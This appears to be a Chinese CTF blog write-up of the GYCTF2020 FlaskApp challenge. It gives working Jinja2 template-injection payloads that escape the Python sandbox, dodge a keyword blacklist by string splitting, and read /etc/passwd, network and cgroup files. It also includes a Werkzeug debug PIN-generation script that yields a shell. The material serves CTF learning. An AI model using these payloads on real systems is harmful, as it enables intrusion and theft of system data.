一天一道ctf 第38天(报错模板注入 python沙盒逃逸 pin码生成)

最新推荐文章于 2024-03-29 23:22:22 发布
最新推荐文章于 2024-03-29 23:22:22 发布
阅读量649 收藏 3
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/118931844
版权

[GYCTF2020]FlaskApp
先得到{{7*7}}的base64加密字符串,然后解密,输出no no no,看样子是被过滤了,这里可能有SSTI模板注入,主要是看怎么绕过过滤
在这里插入图片描述
在这里插入图片描述

随便输入字符串让base64解密报错得到文件位置/usr/local/lib/python3.7/site-packages/flask/app.py
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210720115212441.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NjcmF3bWFu,size_16,color_FFFF
在这里插入图片描述

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

还是把这串命令加密一下然后解密,得到源码
在这里插入图片描述
可以在里面找到waf,过滤了很多字符。也可以找到执行我们输入的base64字符串的代码,通过GET方法将输入的字符串保存在txt中,如果解密后绕过了waf,则执行flash().

 def waf(str): 
 black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"] 
 for x in black_list : 
     if x in str.lower() : return 1

@app.route('/decode';,methods=['POST','GET']) 
def decode(): 
    if request.values.get('text') : 
        text = request.values.get("text") 
        text_decode = base64.b64decode(text.encode()) 
        tmp = "结果 : {0}".format(text_decode.decode()) 
        if waf(tmp) : 
            flash("no no no !!") 
            return redirect(url_for('decode')) 
         res = render_template_string(tmp) 
         flash( res ) 
         return redirect(url_for('decode')) 
     else : 
         text = "" 
         form = NameForm1(text) 
         return render_template("index.html",form = form, method = "解密" , img = "flask1.png")

可以用字符串拼接的方式绕过waf

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

在这里插入图片描述
找到了this_is_the_flag.txt文件,字符串拼接读取flag

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}

在这里插入图片描述

在这里插入图片描述
在之前的报错页面点击右侧的终端图标会要求你输入pin码,所以这道题还有一种解法,可以参考这篇文章
https://blog.csdn.net/SopRomeo/article/details/105875248
https://blog.csdn.net/weixin_39997829/article/details/108849699
得到生成pin码所需要的六要素以后:
(1)用户名:flaskweb

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read() }}{% endif %}{% endfor %}

(2)modename:flaskapp
(3)app.py的绝对路径:/usr/local/lib/python3.7/site-packages/flask/app.py
(4)getattr(app, “name”, app.class.name):Flask
(5)mac地址的十进制数:02:42:ac:10:82:69(2485377860201)

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address','r').read() }}{% endif %}{% endfor %}

(6)docker机器id:1:name=systemd:/docker/07c230865b8e078edbc7b1c7fbf699627037f3e401b0382d96715c839a1d2b78 0::/system.slice/containerd.service

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup','r').read() }}{% endif %}{% endfor %}

然后跑一下脚本生成pin码379-433-719

import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485377860201',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '07c230865b8e078edbc7b1c7fbf699627037f3e401b0382d96715c839a1d2b78'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

可以看到我们已经能使用命令行了
在这里插入图片描述
在这里插入图片描述

scrawman
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF学-Python古典密加密解密脚本
04-30
CTF(Capture The Flag)是一种网络安全竞赛,其中密学挑战是常见的环节,要求参赛者解决各种加密和解密问题。在这个压缩包中,我们有四个Python脚本,分别涉及摩斯密、培根密、ASCII编和解以及凯撒密。...
关于ctf中flaskpin总结
arcuied
02-20 4736
flask pin的相关问题
flask计pin
weixin_63231007的博客
07-13 3720
python flask-pin介绍 & CTF中 flask-pin的应用
*CTF-2022 WEB
qq_53263789的博客
04-24 882
oh-my-notepro python3.8 pin 发现sql注入,可以堆叠注入 生成要素 username, 通过getpass.getuser()读取,通过文件读取/etc/passwd modname, 通过getattr(mod,“file”,None)读取,默认值为flask.app appname, 通过getattr(app,“name”,type(app).name)读取,默认值为Flask moddir, 在flask库下app..
CTF-实验吧-Forms
kongcz的专栏
08-14 298
题目: 似乎有人觉得PIN是不可破解的,让我们证明他是错的。 格式:ctf{} 解题链接:http://ctf5.shiyanbar.com/10/main.php 解题思路: 拿到题目首先查看源,发现有一个input标签,类型为hidden,值为0。 感觉这个可能是一个突破口,使用chrome的审查元素把value改为1,然后pin输入框随便输入一个值点击提交。 然后f...
buuctf_练[GYCTF2020]FlaskApp
m0_66225311的博客
10-26 745
`ssti`的`python debug`的`PIN`,调用`debug`命令行执行命令。存在`ssti`注入就能进行命令执行,使用拼接操作绕过关键字过滤`['o'+'s']`。不同版本的`python`计pin的代不同。`python`的模板注入可以通过for循环遍历子类特征名的方式,来寻找能够执行命令的子类模块
pin-in-CTF:使用intel pin来求解一部分CTF challenge
05-09
【标题】:“pin-in-CTF:利用Intel Pin工具解决CTF挑战” 【知识点详解】 Intel Pin是一款强大的动态二进制分析工具,主要用于程序行为分析、性能监测、代插桩等场景。在“pin-in-CTF”项目中,开发者或安全...
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道
最新发布
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代插入应用程序接收的数据中,进而操纵...
CTF 【每日一题20160630】PYTHON 字节-附件资源
03-02
CTF 【每日一题20160630】PYTHON 字节-附件资源
CTFTools-v1.3.7 所有古典密与现代密与编与一身
06-14
本工具是所有MISC集于一身的解密加密工具 古典密: 1.Affine(仿射加密) 2.Bacon(培根加密) 3.Brainfuck 4.Caesar(凯撒加密) 5.Fence(栅栏加密) 6.Fenham(费纳姆加密) 7.Morse(摩斯密) 8.Pigen(猪圈加密) 9....
CTF题型 nodejs(2) Js沙盒vm&vm2逃逸原理总结&典型例题
qq_39947980的博客
03-29 1602
vm模块和vm2提供了一系列 API 用于在 V8 虚拟机环境中编译和运行代逃逸定义:通过某种方式拿到沙箱外的就成功本质上是拿到实现实现RCE结合命令执行的多种绕过上篇文章做了一个命令执行的绕过小总结。
[GYCTF2020]FlaskApp
Yb_140的博客
10-31 443
flask开启了debug模式+SSTI
CTF刷题
m_de_g的博客
06-01 424
BugKu——SSTI 1、判断是否存在ssti漏洞 2*8=16 说明存在ssti漏洞 List item 2、开始模板注入 知道’’的类型是字符型。 3、接下来我们找其父类 找到父类,父类是’object’ 4、因为只有一个’父类’,需要加一个下标, 5、找父类下的所有子类 {{’’.class.bases[0].subclasses()}} 6、接下来使用脚本,跑出那个子类中含有os模块 运行find_func.py脚本 输入字符串的地方,把所有的子类将其放入到其中,然后模块的话,直接
[*CTF2022]oh_my_lotto_revenge
Huamang的博客
04-21 2877
New 相对于oh_my_lotto,revenge进行了下面的更改 这么做,我们能走的就只有RCE了,而这里唯一能操作的一个地方就是这里,可以操作环境变量 os.environ[lotto_key] = lotto_value 这里有几个非预期解,先看看预期解 Intented writeup 这里可以操控环境变量,那么我们能做的事情就很多了,预期解是操控HOSTALIASES修改hosts 因为他的wget是通过域名下载的 os.system('wget --content-disposition
CTF命令执行绕过总结
gou1791241251的博客
08-04 770
命令执行绕过命令总结
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3395
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin命令执行,但是题目过滤的不够严格导致.
ctf python大法好_浅谈flask与ctf那些事
weixin_32394247的博客
12-30 724
最近跑了培训写了点flask的session伪造,没能用上,刚好整理了一下先前的资料把flask三种考过的点拿出来写写文章。debug pin本地先起一个开启debug模式的服务:本机启动时会打印出如下:多次启动会发现打印的PIN是相同的,分析源自参考链接,可以得出debug pin由六个值决定:用户flask.appFlaskflask目录下的一个app.py的绝对路径当前电脑的MAC地址,为...
[GYCTF2020]FlaskApp(SSTI)
qq_45521281的博客
06-09 2916
进入题目: 是一个用flask写的一个base64加解密应用。有一个加密页面和解密页面,思路应该是在加密页面输入payload进行加密,加密结果在解密页面进行解密,输出解密后的payload被渲染到页面输出后执行了payload。 官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。但是我当时看到的时候并没有想到是debug模式,这就是没有进行足够积累的后果。 base64decode在不会解析的时候就会报错,然后习惯性对base64解密页面进行报错实验,ba
CTF比赛加密技巧: Caesar与Affine密解析
- 字母被赋予数值(通常以字母表的第一个字母对应0),形成一个数值映射。 - 然后,应用一个线性函数,通常是一个多项式,对这些数值进行操作。这个函数的结果必须模上字母表的长度(如26个字母)以保持在字母范围...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值